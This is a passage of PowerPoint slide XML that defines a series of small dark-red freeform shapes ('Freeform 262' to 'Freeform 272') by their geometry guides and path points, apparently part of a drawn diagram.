                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10856" name="Freeform 262"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2667" y="3087"/>
                  <a:ext cx="35" cy="52"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 35 w 35"/>
                    <a:gd name="T1" fmla="*/ 22 h 52"/>
                    <a:gd name="T2" fmla="*/ 35 w 35"/>
                    <a:gd name="T3" fmla="*/ 52 h 52"/>
                    <a:gd name="T4" fmla="*/ 0 w 35"/>
                    <a:gd name="T5" fmla="*/ 29 h 52"/>
                    <a:gd name="T6" fmla="*/ 0 w 35"/>
                    <a:gd name="T7" fmla="*/ 0 h 52"/>
                    <a:gd name="T8" fmla="*/ 35 w 35"/>
                    <a:gd name="T9" fmla="*/ 22 h 52"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 35"/>
                    <a:gd name="T16" fmla="*/ 0 h 52"/>
                    <a:gd name="T17" fmla="*/ 35 w 35"/>
                    <a:gd name="T18" fmla="*/ 52 h 52"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="35" h="52">
                      <a:moveTo>
                        <a:pt x="35" y="22"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="35" y="52"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="29"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="35" y="22"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10857" name="Freeform 263"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2631" y="3064"/>
                  <a:ext cx="35" cy="52"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 35 w 35"/>
                    <a:gd name="T1" fmla="*/ 23 h 52"/>
                    <a:gd name="T2" fmla="*/ 35 w 35"/>
                    <a:gd name="T3" fmla="*/ 52 h 52"/>
                    <a:gd name="T4" fmla="*/ 0 w 35"/>
                    <a:gd name="T5" fmla="*/ 30 h 52"/>
                    <a:gd name="T6" fmla="*/ 0 w 35"/>
                    <a:gd name="T7" fmla="*/ 0 h 52"/>
                    <a:gd name="T8" fmla="*/ 35 w 35"/>
                    <a:gd name="T9" fmla="*/ 23 h 52"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 35"/>
                    <a:gd name="T16" fmla="*/ 0 h 52"/>
                    <a:gd name="T17" fmla="*/ 35 w 35"/>
                    <a:gd name="T18" fmla="*/ 52 h 52"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="35" h="52">
                      <a:moveTo>
                        <a:pt x="35" y="23"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="35" y="52"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="30"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="35" y="23"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="600000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10858" name="Freeform 264"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2594" y="3042"/>
                  <a:ext cx="34" cy="49"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 34 w 34"/>
                    <a:gd name="T1" fmla="*/ 21 h 49"/>
                    <a:gd name="T2" fmla="*/ 34 w 34"/>
                    <a:gd name="T3" fmla="*/ 49 h 49"/>
                    <a:gd name="T4" fmla="*/ 0 w 34"/>
                    <a:gd name="T5" fmla="*/ 27 h 49"/>
                    <a:gd name="T6" fmla="*/ 0 w 34"/>
                    <a:gd name="T7" fmla="*/ 0 h 49"/>
                    <a:gd name="T8" fmla="*/ 34 w 34"/>
                    <a:gd name="T9" fmla="*/ 21 h 49"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 34"/>
                    <a:gd name="T16" fmla="*/ 0 h 49"/>
                    <a:gd name="T17" fmla="*/ 34 w 34"/>
                    <a:gd name="T18" fmla="*/ 49 h 49"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="34" h="49">
                      <a:moveTo>
                        <a:pt x="34" y="21"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="34" y="49"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="27"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="34" y="21"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="400000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10859" name="Freeform 265"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2575" y="3030"/>
                  <a:ext cx="17" cy="39"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 17 w 17"/>
                    <a:gd name="T1" fmla="*/ 11 h 39"/>
                    <a:gd name="T2" fmla="*/ 17 w 17"/>
                    <a:gd name="T3" fmla="*/ 39 h 39"/>
                    <a:gd name="T4" fmla="*/ 0 w 17"/>
                    <a:gd name="T5" fmla="*/ 27 h 39"/>
                    <a:gd name="T6" fmla="*/ 0 w 17"/>
                    <a:gd name="T7" fmla="*/ 0 h 39"/>
                    <a:gd name="T8" fmla="*/ 17 w 17"/>
                    <a:gd name="T9" fmla="*/ 11 h 39"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 17"/>
                    <a:gd name="T16" fmla="*/ 0 h 39"/>
                    <a:gd name="T17" fmla="*/ 17 w 17"/>
                    <a:gd name="T18" fmla="*/ 39 h 39"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="17" h="39">
                      <a:moveTo>
                        <a:pt x="17" y="11"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="17" y="39"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="27"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17" y="11"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10860" name="Freeform 266"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2704" y="3185"/>
                  <a:ext cx="12" cy="38"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 12 w 12"/>
                    <a:gd name="T1" fmla="*/ 8 h 38"/>
                    <a:gd name="T2" fmla="*/ 12 w 12"/>
                    <a:gd name="T3" fmla="*/ 38 h 38"/>
                    <a:gd name="T4" fmla="*/ 0 w 12"/>
                    <a:gd name="T5" fmla="*/ 30 h 38"/>
                    <a:gd name="T6" fmla="*/ 0 w 12"/>
                    <a:gd name="T7" fmla="*/ 0 h 38"/>
                    <a:gd name="T8" fmla="*/ 12 w 12"/>
                    <a:gd name="T9" fmla="*/ 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8"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="12" y="38"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="30"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12" y="8"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10861" name="Freeform 267"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2667" y="3158"/>
                  <a:ext cx="35" cy="55"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 35 w 35"/>
                    <a:gd name="T1" fmla="*/ 24 h 55"/>
                    <a:gd name="T2" fmla="*/ 35 w 35"/>
                    <a:gd name="T3" fmla="*/ 55 h 55"/>
                    <a:gd name="T4" fmla="*/ 0 w 35"/>
                    <a:gd name="T5" fmla="*/ 30 h 55"/>
                    <a:gd name="T6" fmla="*/ 0 w 35"/>
                    <a:gd name="T7" fmla="*/ 0 h 55"/>
                    <a:gd name="T8" fmla="*/ 35 w 35"/>
                    <a:gd name="T9" fmla="*/ 24 h 55"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 35"/>
                    <a:gd name="T16" fmla="*/ 0 h 55"/>
                    <a:gd name="T17" fmla="*/ 35 w 35"/>
                    <a:gd name="T18" fmla="*/ 55 h 55"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="35" h="55">
                      <a:moveTo>
                        <a:pt x="35" y="24"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="35" y="55"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="30"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="35" y="24"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="600000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10862" name="Freeform 268"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2631" y="3132"/>
                  <a:ext cx="35" cy="54"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 35 w 35"/>
                    <a:gd name="T1" fmla="*/ 26 h 54"/>
                    <a:gd name="T2" fmla="*/ 35 w 35"/>
                    <a:gd name="T3" fmla="*/ 54 h 54"/>
                    <a:gd name="T4" fmla="*/ 0 w 35"/>
                    <a:gd name="T5" fmla="*/ 28 h 54"/>
                    <a:gd name="T6" fmla="*/ 0 w 35"/>
                    <a:gd name="T7" fmla="*/ 0 h 54"/>
                    <a:gd name="T8" fmla="*/ 35 w 35"/>
                    <a:gd name="T9" fmla="*/ 26 h 54"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 35"/>
                    <a:gd name="T16" fmla="*/ 0 h 54"/>
                    <a:gd name="T17" fmla="*/ 35 w 35"/>
                    <a:gd name="T18" fmla="*/ 54 h 54"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="35" h="54">
                      <a:moveTo>
                        <a:pt x="35" y="26"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="35" y="54"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="28"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="35" y="26"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10863" name="Freeform 269"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2594" y="3108"/>
                  <a:ext cx="34" cy="52"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 34 w 34"/>
                    <a:gd name="T1" fmla="*/ 24 h 52"/>
                    <a:gd name="T2" fmla="*/ 34 w 34"/>
                    <a:gd name="T3" fmla="*/ 52 h 52"/>
                    <a:gd name="T4" fmla="*/ 0 w 34"/>
                    <a:gd name="T5" fmla="*/ 28 h 52"/>
                    <a:gd name="T6" fmla="*/ 0 w 34"/>
                    <a:gd name="T7" fmla="*/ 0 h 52"/>
                    <a:gd name="T8" fmla="*/ 34 w 34"/>
                    <a:gd name="T9" fmla="*/ 24 h 52"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 34"/>
                    <a:gd name="T16" fmla="*/ 0 h 52"/>
                    <a:gd name="T17" fmla="*/ 34 w 34"/>
                    <a:gd name="T18" fmla="*/ 52 h 52"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="34" h="52">
                      <a:moveTo>
                        <a:pt x="34" y="24"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="34" y="52"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="28"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="34" y="24"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="600000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10864" name="Freeform 270"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2575" y="3095"/>
                  <a:ext cx="17" cy="38"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 17 w 17"/>
                    <a:gd name="T1" fmla="*/ 10 h 38"/>
                    <a:gd name="T2" fmla="*/ 17 w 17"/>
                    <a:gd name="T3" fmla="*/ 38 h 38"/>
                    <a:gd name="T4" fmla="*/ 0 w 17"/>
                    <a:gd name="T5" fmla="*/ 27 h 38"/>
                    <a:gd name="T6" fmla="*/ 0 w 17"/>
                    <a:gd name="T7" fmla="*/ 0 h 38"/>
                    <a:gd name="T8" fmla="*/ 17 w 17"/>
                    <a:gd name="T9" fmla="*/ 10 h 38"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 17"/>
                    <a:gd name="T16" fmla="*/ 0 h 38"/>
                    <a:gd name="T17" fmla="*/ 17 w 17"/>
                    <a:gd name="T18" fmla="*/ 38 h 38"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="17" h="38">
                      <a:moveTo>
                        <a:pt x="17" y="10"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="17" y="38"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="27"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17" y="10"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10865" name="Freeform 271"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2704" y="3257"/>
                  <a:ext cx="11" cy="40"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 11 w 11"/>
                    <a:gd name="T1" fmla="*/ 9 h 40"/>
                    <a:gd name="T2" fmla="*/ 11 w 11"/>
                    <a:gd name="T3" fmla="*/ 40 h 40"/>
                    <a:gd name="T4" fmla="*/ 0 w 11"/>
                    <a:gd name="T5" fmla="*/ 32 h 40"/>
                    <a:gd name="T6" fmla="*/ 0 w 11"/>
                    <a:gd name="T7" fmla="*/ 0 h 40"/>
                    <a:gd name="T8" fmla="*/ 11 w 11"/>
                    <a:gd name="T9" fmla="*/ 9 h 40"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 11"/>
                    <a:gd name="T16" fmla="*/ 0 h 40"/>
                    <a:gd name="T17" fmla="*/ 11 w 11"/>
                    <a:gd name="T18" fmla="*/ 40 h 40"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="11" h="40">
                      <a:moveTo>
                        <a:pt x="11" y="9"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="11" y="40"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="32"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11" y="9"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10866" name="Freeform 272"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2667" y="3229"/>
                  <a:ext cx="35" cy="57"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
